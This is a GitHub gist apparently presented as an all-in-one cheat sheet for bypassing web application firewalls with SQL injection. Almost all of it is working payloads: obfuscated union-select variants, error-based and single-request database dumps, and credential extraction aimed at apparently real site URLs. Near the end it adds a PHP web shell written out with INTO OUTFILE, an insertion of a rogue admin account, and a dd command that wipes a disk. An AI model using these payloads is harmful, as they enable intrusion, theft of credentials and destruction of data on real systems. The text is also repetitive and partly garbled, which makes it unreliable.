Forked from tehseensagar/gist:d82931fa8427b3b8a8825714b5b113c4
Created
October 15, 2023 13:10
-
-
Save abdilahrf/e7139b416854eac8609d1cf021504d73 to your computer and use it in GitHub Desktop.
SQLi WAF Bypass All Method
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
`-=[SQL injection Queries]=- | |
HOW TO SUCCESSFULLY INJECTING SQL INJECTION | |
[~] after id no. like id=1 +/*!and*/+1=0 [~] | |
EX: site.com?index.php?pageid=3 div+0 Union select 1,version(),3,4,5 | |
+div+0 | |
+div false | |
+Having+1=0+ | |
Having false | |
+and false+ | |
and null+ | |
+AND+1=0+ | |
+and+(1)=(0)+ | |
+and+(1)!=(0)+ | |
+and+2>3+ | |
+/*!and*/+1=0 | |
archieving first condition using correct calculation | |
EX: or 5*5*1=25 div+0 Union Select 1,version(),3,4,5 | |
or 1=1 | |
or 0=0 | |
or 25-10-5=5 | |
or 20-5-5=10 | |
or 25-5-5=15 | |
or 5*5*1=25 | |
or 5*5+5=30 | |
[+] archieving first condition using and point [+] | |
EX: and point(29,9) div+0 Union Select 1,version(),3,4,5 | |
and point(29,9) | |
and mod(9,4) | |
and power(5,5) | |
========================================================================================== | |
[+] fixing error using fix point/balancer [+] | |
EX: ORDER BY 100-- | |
oRdEr By 1 asc | |
oRdEr By 1 desc | |
-- | |
--+- | |
--+ | |
-- - | |
' -- - | |
)-- | |
)-- - | |
')--+ | |
')-- - | |
'))-- - | |
%23 | |
%23%23 | |
%60 | |
%00 | |
;%00 | |
%90 | |
/* | |
[+]when the --+- or -- dosen't work use ; | |
bypass error 505 | |
sometimes when union select ,sites become 505 or time out.... | |
bypass using brackets | |
union(select+1) | |
-use %0b or /**/ as space | |
union%0bselect | |
========================================================================================== | |
[+]Dump data using variable method[+] | |
site.com?index.php?id=3 div+0 and @variable:=@@version Union Select 1,@variable,3,4,5 | |
========================================================================================== | |
--'- : +--+ / : -- - : --+- : /* | |
OrDeR By 1 asc | |
OrdeR By 1 desc | |
) order by 1-- - | |
') order by 1-- - | |
')order by 1%23%23 | |
%')order by 1%23%23 | |
Null' order by 100--+ | |
Null' order by 9999--+ | |
')group by 99-- - | |
'group by 119449-- - | |
'group/**/by/**/99%23%23 | |
union select ByPassing method | |
+union+distinct+select+ | |
+union+distinctROW+select+ | |
/**//*!12345UNION SELECT*//**/ | |
/**//*!50000UNION SELECT*//**/ | |
+/*!50000UnIoN*/ /*!50000SeLeCt aLl*/+ | |
+/*!u%6eion*/+/*!se%6cect*/+ | |
/**/uniUNIONon/**/aALLll/**/selSELECTect/**/ | |
1%')and(0)union(select(1),version(),3,4,5,6)%23%23%23 | |
/*!50000%55nIoN*/+/*!50000%53eLeCt*/ | |
union /*!50000%53elect*/ | |
%55nion %53elect | |
+--+Union+--+Select+--+ | |
+UnIoN/*&a=*/SeLeCT/*&a=*/ | |
id=1+’UnI”On’+'SeL”ECT’ | |
id=1+'UnI'||'on'+SeLeCT' | |
UnIoN SeLeCt CoNcAt(version())-- | |
uNiOn aLl sElEcT | |
uUNIONnion all sSELECTelect | |
/*!50000UNION/**_**/+/*!50000SELECT/**_**/*/ | |
=================================================================================================================================== | |
:: Buffer Overflow :: | |
=================================================================================================================================== | |
+And(select 1)=(select 0×414)+union+select+1– | |
+And(select 1)=(select 0xAAAA)+union+select+1– | |
+And(select | |
1)=(select | |
0×4141414141414141414141414141414141414141414141414141414141414141414141414 | |
14141414141414141414141414141414141414141414141414141414141414141414141414141414 | |
14141414141414141414141414141414141414141414141414141414141414141414141414141414 | |
14141414141414141414141414141414141414141414141414141414141414141414141414141414 | |
14141414141414141414141414141414141414141414141414141414141414141414141414141414 | |
14141414141414141414141414141414141414141414141414141414141414141414141414141414 | |
14141414141414141414141414141414141414141414141414141414141414141414141414141414 | |
14141414141414141414141414141414141414141414141414141414141414141414141414141414 | |
14141414141414141414141414141414141414141414141414141414141414141414141414141414 | |
1414141)+ | |
+and (/*!select*/ 1)=(/*!select*/ 0xAA)+ | |
================================================================================================================================== | |
:: 400 Bad Request :: | |
================================================================================================================================== | |
–+%0A | |
union+select+1–+%0A,2–+%0A,3–+%0A,4–+%0A,5–+%0A – | |
================================================================================================================================== | |
null the parameter | |
================================================================================================================================== | |
id=-1 | |
id=null | |
id=1+and+false+ | |
id=9999 | |
id=1 and 0 | |
id==1 | |
id=(-1) | |
======================================================================================================================================= | |
Group_Concat | |
======================================================================================================================================= | |
Group_Concat | |
group_concat() | |
/*!group_concat*/() | |
grOUp_ConCat(/*!*/,0x3e,/*!*/) | |
group_concat(,0x3c62723e) | |
g%72oup_c%6Fncat%28%76%65rsion%28%29,%22~BlackRose%22%29 | |
CoNcAt() | |
CONCAT(DISTINCT Version()) | |
concat(,0x3a,) | |
concat() | |
CoNcAt() | |
/*!50000cOnCat*/(/*!Version()*/) | |
/*!50000cOnCat*/ | |
/**//*!12345cOnCat*/(,0x3a,) | |
concat_ws() | |
concat(0x3a,,0x3c62723e) | |
/*!concat_ws(0x3a,)*/ | |
concat_ws(0x3a3a3a,version() | |
CONCAT_WS(CHAR(32,58,32),version(),) | |
REVERSE(tacnoc) | |
binary(version()) | |
uncompress(compress(version())) | |
aes_decrypt(aes_encrypt(version(),1),1) | |
==================================================================================================================================== | |
To appear column numbr in page put after id | |
==================================================================================================================================== | |
id=1+and+1=0+union+select+1,2,3,4,5,6 | |
+AND+1=0 | |
/*!aND*/ 1 like 0 | |
+/*!and*/+1=0 | |
+and+2>3+ | |
+and(1)=(0) | |
and (1)!=(0) | |
+div+0 | |
Having+1=0 | |
=================================================================================================================================== | |
function ByPassing | |
=================================================================================================================================== | |
unhex(hex(value)) | |
cast(value as char) | |
uncompress(compress(version())) | |
cast(version() as char) | |
aes_decrypt(aes_encrypt(version(),1),1) | |
binary(version()) | |
convert(value using ascii) | |
=================================================================================================================================== | |
avoid source page injection | |
=================================================================================================================================== | |
concat(?”>, | |
,@@version,? | |
“> | |
? | |
injection | |
concat(0x223e,@@version) | |
concat(0x273e27,version(),0x3c212d2d) | |
concat(0x223e3c62723e,version(),0x3c696d67207372633d22) | |
concat(0x223e,@@version,0x3c696d67207372633d22) | |
concat(0x223e,0x3c62723e3c62723e3c62723e,@@version,0x3c696d67207372633d22,0x3c62723e) | |
concat(0x223e3c62723e,@@version,0x3a,”BlackRose”,0x3c696d67207372633d22) | |
concat(‘’,@@version,’’) | |
concat(0x273c2f7469746c653e27,@@version,0x273c7469746c653e27) | |
concat(0x273c2f7469746c653e27,version(),0x273c7469746c653e27) | |
=================================================================================================================================== | |
get version – DB_NAME – user – HOST_NAME – datadir | |
=================================================================================================================================== | |
version() | |
convert(version() using latin1) | |
unhex(hex(version())) | |
@@GLOBAL.VERSION | |
(substr(@@version,1,1)=5) :: 1 true 0 fals | |
# like # | |
http://www.site.com/page.php?id=-13 union select 1,2,(substr(@@version,1,1)=5),4,5 – | |
================================================================================================================================== | |
+and substring(version(),1,1)=4 | |
+and substring(version(),1,1)=5 | |
+and substring(version(),1,1)=9 | |
+and substring(version(),1,1)=10 | |
id=1 /*!50094aaaa*/ error | |
id=1 /*!50095aaaa*/ no error | |
id=1 /*!50096aaaa*/ error | |
# like # http://www.site.com/page.php?id=13 /*!50095aaaa*/ | |
id=1 /*!40123 1=1*/–+- no error | |
id=1 /*!40122rrrr*/ no error | |
# like # http://www.site.com/page.php?id=13 /*!40122rrrr*/ error not v4 | |
================================================================================================================================= | |
DB_NAME() | |
================================================================================================================================= | |
@@database | |
database() | |
id=vv() | |
# like # http://www.site.com/page.php?id=-13 union select 1,2,DB_NAME(),4,5 – | |
http://www.site.com/page.php?id=vv() | |
@@user | |
user() | |
user_name() | |
system_user() | |
# like # http://www.site.com/page.php?id=-13 union select 1,2,user(),4,5 – | |
HOST_NAME() | |
@@hostname | |
@@servername | |
SERVERPROPERTY() | |
# like # http://www.site.com/page.php?id=-13 union select 1,2,HOST_NAME(),4,5 – | |
@@datadir | |
datadir() | |
# like # http://www.site.com/page.php?id=-13 union select 1,2,datadir(),4,5 – | |
ASPX | |
and 1=0/@@version | |
‘ and 1=0/@@version;– | |
‘) and 1=@@version– | |
and 1=0/user;– | |
Requested method | |
[DUMP DB in 1 Request] | |
(select | |
(@) from (select(@:=0×00),(select (@) from (information_schema.columns) | |
where (table_schema>=@) and (@)in (@:=concat(@,0x0a,’ [ | |
',table_schema,' ] >’,table_name,’ > ‘,column_name))))x) | |
(select(@) from (select (@:=0×00),(select (@) from (table) where (@) in (@:=concat(@,0x0a,column1,0x3a,column2))))a) | |
=================================================================================================================================== | |
[DUMP DB in 1 Request improve] | |
=================================================================================================================================== | |
(select(@x)from(select(@x:=0×00),(select(0)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0×00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x) | |
like | |
http://www.site.com/page.php?id=-13 | |
union select | |
1,2,(select(@x)from(select(@x:=0×00),(select(0)from(information_schema.colu | |
mns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0×00)in(@x:=c | |
oncat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x),4,5 | |
– | |
=================================================================================================================================== | |
#2# | |
=================================================================================================================================== | |
method like DUMP DB in 1 Request | |
=================================================================================================================================== | |
concat(@i:=0×00,@o:=0xd0a,benchmark(40,@o:=CONCAT( | |
@o,0xd0a,(SELECT concat(table_schema,0x2E,@i:=table_name) FROM | |
information_schema.tables WHERE table_name>@i order by table_name | |
LIMIT 1))) | |
like | |
http://www.mishnetorah.com/shop/details.php…(@i:=0×00,@o:=0xd0a,benchmark(40,@o:=CONCAT(@o,0xd0a | |
,(SELECT concat(table_schema,0x2E,@i:=table_name) FROM | |
information_schema.tables WHERE table_name>@i order by table_name | |
LIMIT 1))),@o),5,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21 | |
=================================================================================================================================== | |
#3# | |
=================================================================================================================================== | |
databases | |
(select+count(schema_name) +from+information_schema.schemata) | |
# like # | |
http://www.site.com/page.php?id=-13 union select 1,2,(select+count(schema_name) +from+information_schema.schemata),4,5 – | |
tables | |
(select+count(table_name) +from+information_schema.tables) | |
# like # | |
http://www.site.com/page.php?id=-13 union select 1,2,(select+count(table_name) +from+information_schema.tables),4,5 – | |
columns | |
(select+count(column_name) +from+information_schema.columns) | |
# like # | |
http://www.site.com/page.php?id=-13 union select 1,2,(select+count(column_name) +from+information_schema.columns),4,5 – | |
=================================================================================================================================== | |
#4# | |
=================================================================================================================================== | |
show the table with all her columns | |
CONCAT(table_name,0x3e,GROUP_CONCAT(column_name)) | |
+FROM information_schema.columns WHERE table_schema=database() GROUP BY table_name LIMIT 1,1–+ | |
like | |
http://www.site.com/page.php?id=-13 | |
union select 1,2,CONCAT(table_name,0x3e,GROUP_CONCAT(column_name)),4,5 | |
+FROM information_schema.columns WHERE table_schema=database() GROUP BY | |
table_name LIMIT 0,1–+ | |
=================================================================================================================================== | |
#5#WWWWWWWWWWWAAAAAAAAAAAAAAAAAAFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF | |
=================================================================================================================================== | |
feltered requested | |
# tables # | |
group_concat(/*!table_name*/) | |
+/*!froM*/ /*!InfORmaTion_scHema*/.tAblES– - | |
/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=schEMA()– - | |
/*!From*/+%69nformation_schema./**/tAblES+/*!50000Where*/+/*!%54able_ScHEmA*/=schEMA()– - | |
=================================================================================================================================== | |
# columns # | |
=================================================================================================================================== | |
group_concat(/*!column_name*/) | |
+/*!froM*/ InfORmaTion_scHema.cOlumnS /*!WheRe*/ /*!tAblE_naMe*/=hex table | |
/*!From*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=hex table | |
/*!froM*/ table– - | |
=================================================================================================================================== | |
#6# | |
=================================================================================================================================== | |
bypass method | |
(select+group_concat(/*!table_name*/)+/*!From*/+%69nformation_schema./**/tAblES+/*!50000Where*/+/*!%54able_ScHEmA*/=schEMA()) | |
(select+group_concat(/*!column_name*/)+/*!From*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=hex table) | |
like | |
http://www.site.com/page.php?id=-13 | |
union select | |
1,2,(select+group_concat(/*!table_name*/)+/*!From*/+%69nformation_schema./**/tAblES+/*!50000Where*/+/*!%54able_ScHEmA*/=schEMA()),4,5 | |
– | |
=================================================================================================================================== | |
#7# | |
=================================================================================================================================== | |
bypass method | |
unhex(hex(Concat(Column_Name,0x3e,Table_schema,0x3e,table_Name))) | |
/*!from*/information_schema.columns/*!where*/column_name%20/*!like*/char(37,%20112,%2097,%20115,%20115,%2037) | |
like | |
http://www.site.com/page.php?id=-13 | |
union select | |
1,2,unhex(hex(Concat(Column_Name,0x3e,Table_schema,0x3e,table_Name))),4,5 | |
/*!from*/information_schema.columns/*!where*/column_name%20/*!like*/char(37,%20112,%2097,%20115,%20115,%2037)– | |
=================================================================================================================================== | |
[+] Union Select: | |
=================================================================================================================================== | |
union /*!select*/+ | |
union/**/select/**/ | |
/**/union/**/select/**/ | |
/**/union/*!50000select*/ | |
/**//*!12345UNION SELECT*//**/ | |
/**//*!50000UNION SELECT*//**/ | |
/**/uniUNIONon/**/selSELECTect/**/ | |
/**/uniUNIONon/**/aALLll/**/selSELECTect/**/ | |
/**//*!union*//**//*!select*//**/ | |
/**/UNunionION/**/SELselectECT/**/ | |
/**//*UnIOn*//**//*SEleCt*//**/ | |
/**//*U*//*n*//*I*//*O*//*n*//**//*S*//*E*//*l*//*e*//*C*//*t*//**/ | |
/**/UNunionION/**/all/**/SELselectECT/**/ | |
/**//*UnIOn*//**/all/**//*SEleCt*//**/ | |
/**//*U*//*n*//*I*//*O*//*n*//**//*all*//**//*S*//*E*//*l*//*e*//*C*//*t*//**/ | |
uni | |
%20union%20/*!select*/%20 | |
union%23aa%0Aselect | |
union+distinct+select+ | |
union+distinctROW+select+ | |
/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/ | |
%252f%252a*/UNION%252f%252a /SELECT%252f%252a*/ | |
%23sexsexsex%0AUnIOn%23sexsexsex%0ASeLecT+ | |
/*!50000UnIoN*/ /*!50000SeLeCt aLl*/+ | |
/*!u%6eion*/+/*!se%6cect*/+ | |
1%’)and(0)union(select(1),version(),3,4,5,6)%23%23%23 | |
/*!50000%55nIoN*/+/*!50000%53eLeCt*/ | |
union /*!50000%53elect*/ | |
+%2F**/+Union/*!select*/ | |
%55nion %53elect | |
+–+Union+–+Select+–+ | |
+UnIoN/*&a=*/SeLeCT/*&a=*/ | |
uNiOn aLl sElEcT | |
uUNIONnion all sSELECTelect | |
union(select(1),2,3) | |
union (select 1111,2222,3333) | |
union (/*!/**/ SeleCT */ 11) | |
%0A%09UNION%0CSELECT%10NULL% | |
/*!union*//*–*//*!all*//*–*//*!select*/ | |
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C | |
union+sel%0bect | |
+uni*on+sel*ect+ | |
+#1q%0Aunion all#qa%0A#%0Aselect 1,2,3,4,5,6,7,8,9,10%0A#a | |
union(select (1),(2),(3),(4),(5)) | |
UNION(SELECT(column)FROM(table)) | |
id=1+’UnI”On’+’SeL”ECT’ | |
id=1+’UnI’||’on’+SeLeCT’ | |
union select 1–+%0A,2–+%0A,3–+%0A etc …. | |
=================================================================================================================================== | |
[+] Buffer overflow: | |
=================================================================================================================================== | |
+And(select 1)=(select 0×414)+union+select+1– | |
+And(select 1)=(select 0xAAAA)+union+select+1– | |
+and (/*!select*/ 1)=(/*!select*/ 0xAA)+ | |
+and (/*!select*/ 1)=(/*!select*/ 0×414)+ | |
+And(select | |
1)=(select | |
0×4141414141414141414141414141414141414141414141414141414141414141414141414?1414 | |
14141414141414141414141414141414141414141414141414141414141414141414141414141414 | |
1414141414141414141414141414141414141414141414141414141414141414141414141414?141 | |
41414141414141414141414141414141414141414141414141414141414141414141414141414141 | |
41414141414141414141414141414141414141414141414141414141414141414141414141414141 | |
41414141414141414141414141414141414141414141414141414141414141414141414141414141 | |
41414141414141414141414141414141414141414141414141414141414141414141414141414141 | |
41414141414141414141414141414141414141414141414141414141414141414141414141414141 | |
41414141414141414141414141414141414141414141414141414141414141414141414141414141 | |
4141)+ | |
=================================================================================================================================== | |
[+] Group Concat: | |
=================================================================================================================================== | |
Group_Concat | |
group_concat() | |
/*!group_concat*/() | |
grOUp_ConCat(/*!*/,0x3e,/*!*/) | |
group_concat(,0x3c62723e) | |
g%72oup_c%6Fncat%28%76%65rsion%28%29,%22testtest%22%29 | |
CoNcAt() | |
CONCAT(DISTINCT Version()) | |
concat(,0x3a,) | |
concat() | |
CoNcAt() | |
/*!50000cOnCat*/(/*!Version()*/) | |
/*!50000cOnCat*/ | |
/**//*!12345cOnCat*/(,0x3a,) | |
concat_ws() | |
concat(0x3a,,0x3c62723e) | |
/*!concat_ws(0x3a,)*/ | |
concat_ws(0x3a3a3a,version() | |
CONCAT_WS(CHAR(32,58,32),version(),) | |
=================================================================================================================================== | |
ERORE BASED | |
=================================================================================================================================== | |
=21 or 1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1– | |
Database | |
21 | |
and (select 1 from (select count(*),concat((select(select | |
concat(cast(database() as char),0x7e)) from information_schema.tables | |
where table_schema=database() limit 0,1),floor(rand(0)*2))x from | |
information_schema.tables group by x)a) | |
Table_name | |
and | |
(select 1 from (select count(*),concat((select(select | |
concat(cast(table_name as char),0x7e)) from information_schema.tables | |
where table_schema=database() limit 19,1),floor(rand(0)*2))x from | |
information_schema.tables group by x)a) | |
Columns | |
21 | |
and (select 1 from (select count(*),concat((select(select | |
concat(cast(column_name as char),0x7e)) from information_schema.columns | |
where table_name=0x73657474696e6773 limit 2,1),floor(rand(0)*2))x from | |
information_schema.tables group by x)a) | |
extract date | |
http://www.aliqbalschools.org/index.php… | |
and (select 1 from (select count(*),concat((select(select | |
concat(cast(concat(userName,0x7e,passWord) as char),0x7e)) from | |
iqbal_iqbal.settings limit 0,1),floor(rand(0)*2))x from | |
information_schema.tables group by x)a) | |
Notice the limit function in the query | |
A website can have more than 2 two databases, so increase the limit until you find all database names | |
Example: limit 0,1 or limit 1,1 or limit 2,1 | |
=================================================================================================================================== | |
Differences: | |
Error Based Query for Database Extraction: | |
=================================================================================================================================== | |
and | |
(select 1 from (select count(*),concat((select(select | |
concat(cast(database() as char),0x7e)) from information_schema.tables | |
where table_schema=database() limit 0,1),floor(rand(0)*2))x from | |
information_schema.tables group by x)a) | |
Double Query for Database Extraction: | |
and(select | |
1 from(select count(*),concat((select (select | |
concat(0x7e,0×27,cast(database() as char),0×27,0x7e)) from | |
information_schema.tables limit 0,1),floor(rand(0)*2))x from | |
information_schema.tables group by x)a) and 1=1 | |
and(select 1 from(select count(*),concat((select (select (SELECT distinct | |
concat(0x7e,0×27,cast(schema_name as char),0×27,0x7e) FROM information_schema.schemata LIMIT N,1)) from | |
information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 | |
and(select 1 from(select count(*),concat((select (select (SELECT distinct | |
concat(0x7e,0×27,cast(table_name as char),0×27,0x7e) FROM information_schema.tables Where | |
table_schema=0xhex_code_of_database_name LIMIT N,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from | |
information_schema.tables group by x)a) and 1 | |
=================================================================================================================================== | |
WUBI +and+extractvalue(rand(),concat(0x3e,(select+concat(username,0x7e,password)+from+iw_users+limit+0,1)))–+ | |
=================================================================================================================================== | |
Descarci orice linux live, bootezi dupa el si formatezi cu dd+urandom. De acolo nu mai recupereaza NIMENI ceva. | |
Code: dd if=/dev/urandom of=/dev/sda bs=1M | |
I’d say using concat(0xY) | |
Y being ‘’ in hex | |
union select concat(version,0x3c7363726970743e616c6572742827706833776c27293c2f7363726970743e) | |
http://zerocoolhf.altervista.org/level2.php… | |
union select 1,group_concat(column_name),3 FROM information_schema.columns WHERE table_name=concat(’0x’, hex(‘users’) | |
=113′+and+0+union+select+1,(SELECT | |
(@) FROM (SELECT(@:=0×00),(SELECT (@) FROM (information_schema.columns) | |
WHERE (table_schema>=@) AND (@)IN | |
(@:=CONCAT(@,0x3C7363726970743E616C6572742827,’ [ ',table_schema,' ] | |
>’,table_name,’ > | |
‘,column_name,0x27293B3C2F7363726970743E))))x),3–+– | |
injection in sql database addd new user | |
INSERT INTO admins (`name`,`password`,`email`) VALUES (‘unix’,'unixunix’,'[email protected]’) | |
+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(table_nam | |
e+as+char),0x7e))+from+information_schema.tables+where+table_schema=0xDATABASEHE | |
X+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a) | |
CHALLENGES | |
Code: | |
=(13)and(0)union(select(1),group_concat(column_name,0x3c62723e),(3)from(information_schema.columns)where(table_schema=database())and(table_name=0×7365637572697479))–+- | |
=12+and+false/*!union*/ | |
/*!select*/1,group_concat(0x3c62723e,/*!TabLe_NaMe*/),2,concat(user(),0x2a,database(),0x2a,version()),13,0x3c666f6e7420636f6c6f723d626c75653e3c68323e706833776c,15 | |
from information_schema.tables where | |
table_schema=0x66616272697a696f5f636572697070 LiMit 0,1– | |
=/*!uNiOn*/ /*!SeLeCt*/ 1,concat(/*!version(),0x3a,0x3a,AdMinLoGiN,0x3a,0x3a*/),3 /*!fRoM*/ security– | |
=121)+and(0)+/*!uNion*/+/*!seleCt*/+1,2,3,4,version(),6,7– - | |
=121)/**/and false UNION(SELECT 1,2,3,4,5,6,7)–+- | |
=121 div 0 ) /*!UNION*/ /*!SELECT*/ 1,2,3,4,5,6,version()# | | |
null’+union+select+1,2,count(schema_name),4,5+from+information_schema.schemata– x | |
=================================================================================================================================== | |
Error Based: | |
=================================================================================================================================== | |
+or+1+group+by+concat_ws(0x7e,version(),floor(rand(0)*2))+having+min(0)+or+1– | |
or 1 group by concat(0x3a,(select substr(group_concat(username,0x3a,password),1,150) | |
from rmdsz_user),floor(rand(0)*2)) having min(0) or 1– - | |
or 1 group by concat_ws(0x7e,version(),floor(rand(0)*2)) having min(0) or 1 — - | |
and | |
(select 1 from (select count(*),concat((select(select | |
concat(cast(database() as char),0x7e)) from information_schema.tables | |
where table_schema=database() limit 0,1),floor(rand(0)*2))x from | |
information_schema.tables group by x)a) | |
+AND(SELECT | |
COUNT(*) FROM (SELECT 1 UNION SELECT null UNION SELECT !1)x GROUP by | |
CONCAT((SELECT version() FROM information_schema.tables LIMIT | |
0,1),FLOOR(RAND(0)*2))) | |
+and+(select+1+from+(select+count(*)+from+(select+1+union+select+2+union+select+ | |
3)x+group+by+concat(mid((select+concat_ws(0x7e,version(),0x7e)+from+information_ | |
schema.tables+limit+0,1),1,25),floor(rand(0)*2)))a)– x | |
or 1=convert(int,(@@version))- | |
+or+1+group+by+concat_ws(0x7e,version(),floor(rand(0)*2))+having+min(0)+or+1– | |
+and+(select+1+from+(select+count(*),concat((select(select+concat(c | |
ast(count(schema_name)+as+char),0x7e))+from+information_schema.schemata+limit+0, | |
1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a) | |
(42)and(0)union(select(1),2,version(),4,5,0x3c623e3c666f6e7420636f6c6f723d626c75653e706833776c,7,8,9,(10))–+- | |
=================================================================================================================================== | |
WAF BYPASS BY TOTTI | |
=================================================================================================================================== | |
=-2/*1337*/UNION/*1337*/(SELECT/*1337*/1337,concat_ws(0x203a20,0x746f7474693933,table_nam | |
e)/*1337*/FROM/*1337*/INFORMATION_SCHEMA./*!TABLES*//*1337*/WHERE/*1337*/TABLE_SCHEMA=database())– | |
- | |
=2+and(0)+union+distinctROW+select+1,/*!50000CoNcaT*/(0x706833776c,0x3a,table_name) | |
/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ | |
/*!TaBle_ScHEmA*/=database()– - | |
=================================================================================================================================== | |
WUBI | |
– | |
1,(select(@x)from(select(@x:=0×00),(select(0)from(information_schema.columns)where(table_schema!=0×69)and(0×00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2020203d3e3e202020,table_name,0x20203a3a3a32020,column_name))))x),3,4– | |
(select | |
(@) from (select(@:=0×00),(select (@) from (information_schema.columns) | |
where (table_schema>=@) and (@)in (@:=concat(@,0x0a,’ [ | |
',table_schema,' ] >’,table_name,’ > ‘,column_name))))x) | |
(select (@) from (select (@x:=0×00),(select (@) from (database.table) where (@) in (@:=concat(@,0x0a,columns)))x) | |
(select (@) from (select (@x:=0×00),(select (@) from (database.table) where (@) in (@:=concat(@,0x0a,columns)))x) | |
=================================================================================================================================== | |
+and+1=convert(int,SERVERPROPERTY(‘ProductVersion’)) | |
test | |
http://www.site.ro/nou/articol.php?id=-angajari’+and+extractvalue(rand(),concat(0x3e,(select+concat(username,0x7e,password)+from+iw_users+limit+0,1)))–+ | |
………………………………….. | |
http://www.site.ro/nou/articol.php?id=-angajari’ | |
and (select 1 from (select count(*),concat((select(select | |
concat(cast(table_name as char),0x7e)) from information_schema.tables | |
where table_schema=0x64625f6d74 limit 10,1),floor(rand(0)*2))x from | |
information_schema.tables group by x)a)–+ | |
SELECT “ system($_REQUEST['cmd']); ?>” | |
INTO OUTFILE “full/path/here/cmd.php” | |
========================================================================================== | |
[~] order by [~] | |
/**/ORDER/**/BY/**/ | |
/*!order*/+/*!by*/ | |
/*!ORDER BY*/ | |
/*!50000ORDER BY*/ | |
/*!50000ORDER*//**//*!50000BY*/ | |
/*!12345ORDER*/+/*!BY*/ | |
ORDER BY 100 DESC | |
ORDER BY 100 ASC | |
========================================================================================== | |
[~] UNION select [~] | |
/*!00000Union*/ /*!00000Select*/ | |
/*!50000%55nIoN*/ /*!50000%53eLeCt*/ | |
%55nion %53elect | |
%55nion(%53elect 1,2,3)-- - | |
+union+distinct+select+ | |
+union+distinctROW+select+ | |
/**//*!12345UNION SELECT*//**/ | |
/**//*!50000UNION SELECT*//**/ | |
/**/UNION/**//*!50000SELECT*//**/ | |
/*!50000UniON SeLeCt*/ | |
union /*!50000%53elect*/ | |
+ #?uNiOn + #?sEleCt | |
+ #?1q %0AuNiOn all#qa%0A#%0AsEleCt | |
/*!%55NiOn*/ /*!%53eLEct*/ | |
/*!u%6eion*/ /*!se%6cect*/ | |
+un/**/ion+se/**/lect | |
uni%0bon+se%0blect | |
%2f**%2funion%2f**%2fselect | |
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A | |
REVERSE(noinu)+REVERSE(tceles) | |
/*--*/union/*--*/select/*--*/ | |
union (/*!/**/ SeleCT */ 1,2,3) | |
/*!union*/+/*!select*/ | |
union+/*!select*/ | |
/**/union/**/select/**/ | |
/**/uNIon/**/sEleCt/**/ | |
+%2F**/+Union/*!select*/ | |
/**//*!union*//**//*!select*//**/ | |
/*!uNIOn*/ /*!SelECt*/ | |
+union+distinct+select+ | |
+union+distinctROW+select+ | |
uNiOn aLl sElEcT | |
UNIunionON+SELselectECT | |
/**/union/*!50000select*//**/ | |
0%a0union%a0select%09 | |
%0Aunion%0Aselect%0A | |
%55nion/**/%53elect | |
uni<on all="" sel="">/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/ | |
%252f%252a*/UNION%252f%252a /SELECT%252f%252a*/ | |
%0A%09UNION%0CSELECT%10NULL% | |
/*!union*//*--*//*!all*//*--*//*!select*/ | |
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C | |
/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/ | |
+UnIoN/*&a=*/SeLeCT/*&a=*/ | |
union+sel%0bect | |
+uni*on+sel*ect+ | |
+#1q%0Aunion all#qa%0A#%0Aselect | |
union(select (1),(2),(3),(4),(5)) | |
UNION(SELECT(column)FROM(table)) | |
%23xyz%0AUnIOn%23xyz%0ASeLecT+ | |
%23xyz%0A%55nIOn%23xyz%0A%53eLecT+ | |
union(select(1),2,3) | |
union (select 1111,2222,3333) | |
uNioN (/*!/**/ SeleCT */ 11) | |
union (select 1111,2222,3333) | |
+#1q%0AuNiOn all#qa%0A#%0AsEleCt | |
/**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/ | |
%0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/ | |
+%23sexsexsex%0AUnIOn%23sexsexs ex%0ASeLecT+ | |
+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C | |
/*!f****U%0d%0aunion*/+/*!f****U%0d%0aSelEct*/ | |
+%23blobblobblob%0aUnIOn%23blobblobblob%0aSeLe cT+ | |
/*!blobblobblob%0d%0aunion*/+/*!blobblobblob%0d%0aSelEct*/ | |
/union\sselect/g | |
/union\s+select/i | |
/*!UnIoN*/SeLeCT | |
+UnIoN/*&a=*/SeLeCT/*&a=*/ | |
+uni>on+sel>ect+ | |
+(UnIoN)+(SelECT)+ | |
+(UnI)(oN)+(SeL)(EcT) | |
+’UnI”On’+'SeL”ECT’ | |
+uni on+sel ect+ | |
+/*!UnIoN*/+/*!SeLeCt*/+ | |
/*!u%6eion*/ /*!se%6cect*/ | |
uni%20union%20/*!select*/%20 | |
union%23aa%0Aselect | |
/**/union/*!50000select*/ | |
/^.*union.*$/ /^.*select.*$/ | |
/*union*/union/*select*/select+ | |
/*uni X on*/union/*sel X ect*/ | |
+un/**/ion+sel/**/ect+ | |
+UnIOn%0d%0aSeleCt%0d%0a | |
UNION/*&test=1*/SELECT/*&pwn=2*/ | |
un?<ion sel="">+un/**/ion+se/**/lect+ | |
